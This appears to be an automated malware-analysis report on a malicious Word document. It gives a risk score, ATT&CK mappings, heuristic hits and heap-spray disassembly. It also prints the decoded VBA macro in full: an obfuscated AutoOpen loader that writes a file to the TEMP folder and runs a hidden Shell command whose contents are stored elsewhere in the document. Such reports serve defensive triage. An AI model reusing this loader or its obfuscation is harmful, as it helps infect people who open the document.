MALICIOUS
278
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro utilizes `Shell()` and `CreateObject()` calls, indicating an attempt to download and execute a second-stage payload. The obfuscated string concatenation within the script suggests an effort to hide the true nature of the payload or its destination. The ClamAV detection of 'Ole2.Macro.Agent' further supports its malicious nature.
Heuristics 10
-
ClamAV: Ole2.Macro.Agent-9858864-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Ole2.Macro.Agent-9858864-1
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell yTGliyTIasdd, 0 -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set hgJBsdasdDD = CreateObject("Scr" + yufGHJ + "g.FileSy" + gUYbjk + "ject") Dim EDNjGrlc, ZcErDyNX, FEhugLeu As String -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub autoopen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Set TDYFUGasdDc = hgJBsdasdDD.CreateTextFile(Environ("TEMP") & "\pan" + asjhdbkx + "x", True) Dim IawqTVly, nksXxyIO, ydMjOnnA As String -
Heap-spray pattern detected high SC_HEAP_SPRAYRepeated 0x41 (A) bytes found
Disassembly
Attempted x86 opcode disassembly0000F49C 41 inc ecx 0000F49D 41 inc ecx 0000F49E 41 inc ecx 0000F49F 41 inc ecx 0000F4A0 41 inc ecx 0000F4A1 41 inc ecx 0000F4A2 41 inc ecx 0000F4A3 41 inc ecx 0000F4A4 41 inc ecx 0000F4A5 41 inc ecx 0000F4A6 41 inc ecx 0000F4A7 41 inc ecx 0000F4A8 41 inc ecx 0000F4A9 41 inc ecx 0000F4AA 41 inc ecx 0000F4AB 41 inc ecx 0000F4AC 41 inc ecx 0000F4AD 41 inc ecx 0000F4AE 41 inc ecx 0000F4AF 41 inc ecx 0000F4B0 41 inc ecx 0000F4B1 41 inc ecx 0000F4B2 41 inc ecx 0000F4B3 41 inc ecx 0000F4B4 41 inc ecx 0000F4B5 41 inc ecx 0000F4B6 41 inc ecx 0000F4B7 41 inc ecx 0000F4B8 41 inc ecx 0000F4B9 41 inc ecx 0000F4BA 41 inc ecx 0000F4BB 41 inc ecx 0000F4BC 41 inc ecx 0000F4BD 41 inc ecx 0000F4BE 41 inc ecx 0000F4BF 41 inc ecx 0000F4C0 41 inc ecx 0000F4C1 41 inc ecx 0000F4C2 41 inc ecx 0000F4C3 41 inc ecx 0000F4C4 41 inc ecx 0000F4C5 41 inc ecx 0000F4C6 41 inc ecx 0000F4C7 41 inc ecx 0000F4C8 41 inc ecx 0000F4C9 41 inc ecx 0000F4CA 41 inc ecx 0000F4CB 41 inc ecx 0000F4CC 41 inc ecx 0000F4CD 41 inc ecx 0000F4CE 41 inc ecx 0000F4CF 41 inc ecx 0000F4D0 41 inc ecx 0000F4D1 41 inc ecx 0000F4D2 41 inc ecx 0000F4D3 41 inc ecx 0000F4D4 41 inc ecx 0000F4D5 41 inc ecx 0000F4D6 41 inc ecx 0000F4D7 41 inc ecx 0000F4D8 41 inc ecx 0000F4D9 41 inc ecx 0000F4DA 41 inc ecx 0000F4DB 41 inc ecx 0000F4DC 41 inc ecx 0000F4DD 41 inc ecx 0000F4DE 41 inc ecx 0000F4DF 41 inc ecx 0000F4E0 41 inc ecx 0000F4E1 41 inc ecx 0000F4E2 41 inc ecx 0000F4E3 41 inc ecx 0000F4E4 41 inc ecx 0000F4E5 41 inc ecx 0000F4E6 41 inc ecx 0000F4E7 41 inc ecx 0000F4E8 41 inc ecx 0000F4E9 41 inc ecx 0000F4EA 41 inc ecx 0000F4EB 41 inc ecx 0000F4EC 41 inc ecx 0000F4ED 41 inc ecx 0000F4EE 41 inc ecx 0000F4EF 41 inc ecx 0000F4F0 41 inc ecx 0000F4F1 41 inc ecx 0000F4F2 41 inc ecx 0000F4F3 41 inc ecx 0000F4F4 41 inc ecx 0000F4F5 41 inc ecx 0000F4F6 41 inc ecx 0000F4F7 41 inc ecx 0000F4F8 41 inc ecx 0000F4F9 41 inc ecx 0000F4FA 41 inc ecx 0000F4FB 41 inc ecx
-
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLEDLong run of 0x41 bytes
Disassembly
Attempted x86 opcode disassembly0000BACD 41 inc ecx 0000BACE 41 inc ecx 0000BACF 41 inc ecx 0000BAD0 41 inc ecx 0000BAD1 41 inc ecx 0000BAD2 41 inc ecx 0000BAD3 41 inc ecx 0000BAD4 41 inc ecx 0000BAD5 41 inc ecx 0000BAD6 41 inc ecx 0000BAD7 41 inc ecx 0000BAD8 41 inc ecx 0000BAD9 41 inc ecx 0000BADA 41 inc ecx 0000BADB 41 inc ecx 0000BADC 41 inc ecx 0000BADD 41 inc ecx 0000BADE 41 inc ecx 0000BADF 41 inc ecx 0000BAE0 41 inc ecx 0000BAE1 41 inc ecx 0000BAE2 41 inc ecx 0000BAE3 41 inc ecx 0000BAE4 41 inc ecx 0000BAE5 41 inc ecx 0000BAE6 41 inc ecx 0000BAE7 41 inc ecx 0000BAE8 41 inc ecx 0000BAE9 41 inc ecx 0000BAEA 41 inc ecx 0000BAEB 41 inc ecx 0000BAEC 41 inc ecx 0000BAED 41 inc ecx 0000BAEE 41 inc ecx 0000BAEF 41 inc ecx 0000BAF0 41 inc ecx 0000BAF1 41 inc ecx 0000BAF2 41 inc ecx 0000BAF3 41 inc ecx 0000BAF4 41 inc ecx 0000BAF5 41 inc ecx 0000BAF6 41 inc ecx 0000BAF7 41 inc ecx 0000BAF8 41 inc ecx 0000BAF9 41 inc ecx 0000BAFA 41 inc ecx 0000BAFB 41 inc ecx 0000BAFC 51 push ecx 0000BAFD 41 inc ecx 0000BAFE 41 inc ecx 0000BAFF 41 inc ecx 0000BB00 41 inc ecx 0000BB01 46 inc esi 0000BB02 42 inc edx 0000BB03 46 inc esi 0000BB04 41 inc ecx 0000BB05 41 inc ecx 0000BB06 42 inc edx 0000BB07 4d dec ebp 0000BB08 41 inc ecx 0000BB09 52 push edx 0000BB0A 41 inc ecx 0000BB0B 41 inc ecx 0000BB0C 56 push esi 0000BB0D 7745 ja 0xbb54 0000BB0F 42 inc edx 0000BB10 41 inc ecx 0000BB11 41 inc ecx 0000BB12 41 inc ecx 0000BB13 4d dec ebp 0000BB14 41 inc ecx 0000BB15 6741 inc ecx 0000BB17 6f outsd dx, dword ptr [esi] 0000BB18 41 inc ecx 0000BB19 51 push ecx 0000BB1A 41 inc ecx 0000BB1B 41 inc ecx 0000BB1C 3441 xor al, 0x41 0000BB1E 41 inc ecx 0000BB1F 48 dec eax 0000BB20 41 inc ecx 0000BB21 7773 ja 0xbb96 0000BB23 42 inc edx 0000BB24 41 inc ecx 0000BB25 677741 ja 0xbb69 0000BB28 6b414141 imul eax, dword ptr [ecx + 0x41], 0x41 0000BB2C 67 .byte 0x67
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8069 bytes |
SHA-256: 95080f497ed431cd6cf3421042b5e990fab8dd47be690f20a4e4c405d4f21764 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
153 of 219 identifiers look randomly generated (e.g. 'hgKjhasdjDDD11') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
Dim hgJBsdasdDD, TDYFUGasdDc
Dim PZOTcVvh, IddlwNtF, MlBwVFiB As String
Dim PWkSOXRl, TXZVrazm, ACSpvtbw As String
PWkSOXRl = " VSQVOK "
TXZVrazm = LTrim(PWkSOXRl)
ACSpvtbw = RTrim(TXZVrazm)
PZOTcVvh = " HBYBNA "
Dim iRrAyvqN, NWWdCTnE, TJZUpakw As String
iRrAyvqN = " KYKFBV "
NWWdCTnE = LTrim(iRrAyvqN)
TJZUpakw = RTrim(NWWdCTnE)
IddlwNtF = LTrim(PZOTcVvh)
Dim vNRhWiWu, aqKpRTRA, haVDPjHp As String
vNRhWiWu = " OLLRCU "
aqKpRTRA = LTrim(vNRhWiWu)
haVDPjHp = RTrim(aqKpRTRA)
MlBwVFiB = RTrim(IddlwNtF)
Dim gAzpgkkf, nUFdJywv, SDnhlLvO As String
gAzpgkkf = " TBGFWQ "
nUFdJywv = LTrim(gAzpgkkf)
SDnhlLvO = RTrim(nUFdJywv)
yTGliyTIasdd = iyUGBKJdasddd.hgKjhasdjDDD1 + iyUGBKJdasddd.hgKjhasdjDDD2 + iyUGBKJdasddd.hgKjhasdjDDD3 + iyUGBKJdasddd.hgKjhasdjDDD4 + iyUGBKJdasddd.hgKjhasdjDDD5 + iyUGBKJdasddd.hgKjhasdjDDD6 + iyUGBKJdasddd.hgKjhasdjDDD7 + iyUGBKJdasddd.hgKjhasdjDDD8 + iyUGBKJdasddd.hgKjhasdjDDD9 + iyUGBKJdasddd.hgKjhasdjDDD10
Dim lWwvOhlk, gWTPrlHl, pXGXvvfm As String
Dim zlChhEUG, CmiAPUtH, LwkDtSZK As String
zlChhEUG = " UVADNI "
CmiAPUtH = LTrim(zlChhEUG)
LwkDtSZK = RTrim(CmiAPUtH)
lWwvOhlk = " HQDJOA "
Dim AFeYjrxM, uOQaEvgQ, SRlwHLyE As String
AFeYjrxM = " ZQKHRD "
uOQaEvgQ = LTrim(AFeYjrxM)
SRlwHLyE = RTrim(uOQaEvgQ)
gWTPrlHl = LTrim(lWwvOhlk)
Dim BbYiBYtl, dhQSrkjz, GnNYDGNw As String
BbYiBYtl = " GWHKPN "
dhQSrkjz = LTrim(BbYiBYtl)
GnNYDGNw = RTrim(dhQSrkjz)
pXGXvvfm = RTrim(gWTPrlHl)
Dim LAgscEzT, tUagBktH, jDDkntia As String
LAgscEzT = " APNCFP "
tUagBktH = LTrim(LAgscEzT)
jDDkntia = RTrim(tUagBktH)
yufGHJ = "iptin"
Dim TGIqKzki, qQhTtcpN, HYVakKaJ As String
Dim ItEKzSbR, RtDrxJCY, byChJWmU As String
ItEKzSbR = " VHJALD "
RtDrxJCY = LTrim(ItEKzSbR)
byChJWmU = RTrim(RtDrxJCY)
TGIqKzki = " CAEVZM "
Dim gGSXWydz, LPlkoAtM, vTaSwXXQ As String
gGSXWydz = " GATHRX "
LPlkoAtM = LTrim(gGSXWydz)
vTaSwXXQ = RTrim(LPlkoAtM)
qQhTtcpN = LTrim(TGIqKzki)
Dim FqUBuYrB, eaDEdkhU, TszcXGBa As String
FqUBuYrB = " PFJDFN "
eaDEdkhU = LTrim(FqUBuYrB)
TszcXGBa = RTrim(eaDEdkhU)
HYVakKaJ = RTrim(qQhTtcpN)
Dim ZVetOHBt, nOYKUKTE, SGlWoYIF As String
ZVetOHBt = " SPGSTC "
nOYKUKTE = LTrim(ZVetOHBt)
SGlWoYIF = RTrim(nOYKUKTE)
gUYbjk = "stemOb"
Dim SwOXlWmc, asFbvYYy, Ecelirhn As String
Dim YHeMMLST, ZJdyfCpY, cJxkIzUI As String
YHeMMLST = " COEZGH "
ZJdyfCpY = LTrim(YHeMMLST)
cJxkIzUI = RTrim(ZJdyfCpY)
SwOXlWmc = " OMJSLI "
Dim twyxzlNO, CSXiLngd, ZIRZyXut As String
twyxzlNO = " JZLQCW "
CSXiLngd = LTrim(twyxzlNO)
ZIRZyXut = RTrim(CSXiLngd)
asFbvYYy = LTrim(SwOXlWmc)
Dim YZmNKJBt, oDOMAgIv, cEGcYNMu As String
YZmNKJBt = " DUGXWB "
oDOMAgIv = LTrim(YZmNKJBt)
cEGcYNMu = RTrim(oDOMAgIv)
Ecelirhn = RTrim(asFbvYYy)
Dim QmlCnQnl, OyXOvDuL, WsISanpe As String
QmlCnQnl = " JXCIAM "
OyXOvDuL = LTrim(QmlCnQnl)
WsISanpe = RTrim(OyXOvDuL)
Set hgJBsdasdDD = CreateObject("Scr" + yufGHJ + "g.FileSy" + gUYbjk + "ject")
Dim EDNjGrlc, ZcErDyNX, FEhugLeu As String
Dim UoqfFTUX, EpmboPtV, vpRQEFZB As String
UoqfFTUX = " CKUSSP "
EpmboPtV = LTrim(UoqfFTUX)
vpRQEFZB = RTrim(EpmboPtV)
EDNjGrlc = " DTFKOR "
Dim xMGYtHAp, aGczkqlz, YPtxRYpL As String
xMGYtHAp = " NFQJVU "
aGczkqlz = LTrim(xMGYtHAp)
YPtxRYpL = RTrim(aGczkqlz)
ZcErDyNX = LTrim(EDNjGrlc)
Dim gtUazCyF, EWSTuIkx, yuabHyaH As String
gtUazCyF = " CQHFQO "
EWSTuIkx = LTrim(gtUazCyF)
yuabHyaH = RTrim(EWSTuIkx)
FEhugLeu = RTrim(ZcErDyNX)
Dim peUDviJz, wolHNXMd, lLCZVVnS As String
peUDviJz = " EDTENY "
wolHNXMd = LTrim(peUDviJz)
lLCZVVnS = RTrim(wolHNXMd)
asjhdbkx = "da.pf"
Dim lwGCMgsK, fxBpflOL, pcowIcuW As String
Dim AlRDCDJX, clFBjKgC, llVqQXSV As String
AlRDCDJX = " MCJVHD "
clFBjKgC = LTrim(AlRDCDJX)
llVqQXSV = RTrim(clFBjKgC)
lwGCMgsK = " HBCRGA "
Dim TlLlYZLy, pgnDLCPV, GpoiykZG As String
TlLlYZLy = " CHIZCY "
pgnDLCPV = LTrim(TlLlYZLy)
GpoiykZG = RTrim(pgnDLCPV)
fxBpflOL = LTrim(lwGCMgsK)
Dim hnRqKHVj, KQLtAfUQ, uABOUBLl As String
hnRqKHVj = " TYMAWV "
KQLtAfUQ = LTrim(hnRqKHVj)
uABOUBLl = RTrim(KQLtAfUQ)
pcowIcuW = RTrim(fxBpflOL)
Dim HFuDZdro, eMLHrail, gNTLTGqE As String
HFuDZdro = " LYKEZI "
eMLHrail = LTrim(HFuDZdro)
gNTLTGqE = RTrim(eMLHrail)
Set TDYFUGasdDc = hgJBsdasdDD.CreateTextFile(Environ("TEMP") & "\pan" + asjhdbkx + "x", True)
Dim IawqTVly, nksXxyIO, ydMjOnnA As String
Dim pVYReBWK, tBHHxrlL, aBNeJoHM As String
pVYReBWK = " QDKMLL "
tBHHxrlL = LTrim(pVYReBWK)
aBNeJoHM = RTrim(tBHHxrlL)
IawqTVly = " YJAYQQ "
Dim GIGOXlOg, mExroFnu, fMfGNWGP As String
GIGOXlOg = " OIQKLW "
mExroFnu = LTrim(GIGOXlOg)
fMfGNWGP = RTrim(mExroFnu)
nksXxyIO = LTrim(IawqTVly)
Dim thsOLeKw, lykdBFrr, WjTuIsDc As String
thsOLeKw = " KJYTUS "
lykdBFrr = LTrim(thsOLeKw)
WjTuIsDc = RTrim(lykdBFrr)
ydMjOnnA = RTrim(nksXxyIO)
Dim MLvcCrto, yNqnvJil, kyCENTsR As String
MLvcCrto = " WINWSR "
yNqnvJil = LTrim(MLvcCrto)
kyCENTsR = RTrim(yNqnvJil)
TDYFUGasdDc.Write (iyUGBKJdasddd.hgKjhasdjDDD11)
Dim tDVDfnzT, lZrjldff, XFkqePCU As String
Dim tBJDSVcb, DRKIEhcG, IRzMCmWH As String
tBJDSVcb = " ZELHXB "
DRKIEhcG = LTrim(tBJDSVcb)
IRzMCmWH = RTrim(DRKIEhcG)
tDVDfnzT = " KZBUJV "
Dim tmsXeXYa, OjLjhkcK, gsAQZShP As String
tmsXeXYa = " JAXVCP "
OjLjhkcK = LTrim(tmsXeXYa)
gsAQZShP = RTrim(OjLjhkcK)
lZrjldff = LTrim(tDVDfnzT)
Dim ojLyNKnL, QZuNOhpd, NldEGawW As String
ojLyNKnL = " MJXJPY "
QZuNOhpd = LTrim(ojLyNKnL)
NldEGawW = RTrim(QZuNOhpd)
XFkqePCU = RTrim(lZrjldff)
Dim TzbgrpYc, JiskTVOU, rfVmiQDK As String
TzbgrpYc = " WCTBTN "
JiskTVOU = LTrim(TzbgrpYc)
rfVmiQDK = RTrim(JiskTVOU)
TDYFUGasdDc.Close
Dim emlXEZBV, atXIARTx, dsIQrlIU As String
Dim TweGLhOb, Axfaflun, xccdIvRA As String
TweGLhOb = " XBRBFA "
Axfaflun = LTrim(TweGLhOb)
xccdIvRA = RTrim(Axfaflun)
emlXEZBV = " BXCUEH "
Dim WCNGkVvp, nLIpRlhz, yFhRJDiM As String
WCNGkVvp = " TTSDGJ "
nLIpRlhz = LTrim(WCNGkVvp)
yFhRJDiM = RTrim(nLIpRlhz)
atXIARTx = LTrim(emlXEZBV)
Dim uaAwOZIe, OsHhlNkx, VzWLcSEt As String
uaAwOZIe = " NMKUJK "
OsHhlNkx = LTrim(uaAwOZIe)
VzWLcSEt = RTrim(OsHhlNkx)
dsIQrlIU = RTrim(atXIARTx)
Dim TTQxGzTx, EjfpDrqW, GxNdgKgy As String
TTQxGzTx = " FAYWIE "
EjfpDrqW = LTrim(TTQxGzTx)
GxNdgKgy = RTrim(EjfpDrqW)
Shell yTGliyTIasdd, 0
End Sub
Attribute VB_Name = "iyUGBKJdasddd"
Attribute VB_Base = "0{66AB4D45-849F-4A75-A347-FBE52CBB66D5}{0584011C-B1B1-4DB6-94FE-EDBE2FAFDE09}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.